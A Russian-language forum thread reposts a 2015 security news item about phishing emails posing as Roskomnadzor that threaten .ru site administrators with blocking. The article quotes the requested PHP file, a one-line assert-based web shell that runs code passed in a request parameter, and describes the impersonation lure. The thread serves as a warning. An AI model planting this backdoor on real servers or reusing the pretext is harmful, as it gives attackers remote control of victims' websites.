Author

Topic: Злоумышленники рассылают поддельные пис (Read 430 times)

legendary
Activity: 2184
Merit: 1012
Интересно, много человек купилось на эту откровенную лажу?
Думаю что нет, ибо с одной стороны конечно истерия вещь заразная, с другой стороны владельцы сайтов не самые легковерные обитатели сети Grin
sr. member
Activity: 270
Merit: 250
Интересно, много человек купилось на эту откровенную лажу?
legendary
Activity: 994
Merit: 1000
Злоумышленники рассылают поддельные письма от Роскомнадзора, угрожая блокировкой

27 Августа, 2015

Как стало известно, злоумышленники запустили вредоносную кампанию якобы от имени Роскомнадзора. 25-26 августа нынешнего года администраторы доменных имен в зоне .ru получили электронную рассылку, подписанную ведомством. В письмах, отправленных с адреса zapret-info @roskomnadzor .org, сказано, что получатель должен разместить на сервере файл с названием reestr-id198617.php, который необходим для его идентификации в качестве администратора доменного имени.

Похоже на то, что мошенники решили воспользоваться ажиотажем вокруг внесения в реестр запрещенных сайтов и дальнейшего исключения из него «Википедии» за статью о наркотическом веществе. Поскольку блокировка ресурса в РФ осуществляется по решению суда, в фальшивых письмах от Роскомнадзора злоумышленники также ссылаются на судебное постановление, а точнее, на решение Новокуйбышевского городского суда Самарской области.

В письме идет речь о том, что аудитория сайта, администратором которого является потенциальная жертва, насчитывает свыше трех тысяч человек в сутки. В связи с этим получатель письма должен идентифицировать себя как администратора сайта. Для этого необходимо создать в корневой директории ресурса папку reestr, а в ней – файл reestr-id198617.php с текстом:

/*Подтверждение доменного имени www.ХХХХХ.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));?>


Отметим, что функция assert выполняет вредоносные инструкции.

В случае невыполнения «решения суда» в течение 72 часов с момента получения письма сайту грозит блокировка на территории РФ.  

http://www.securitylab.ru/news/474463.php    
Jump to: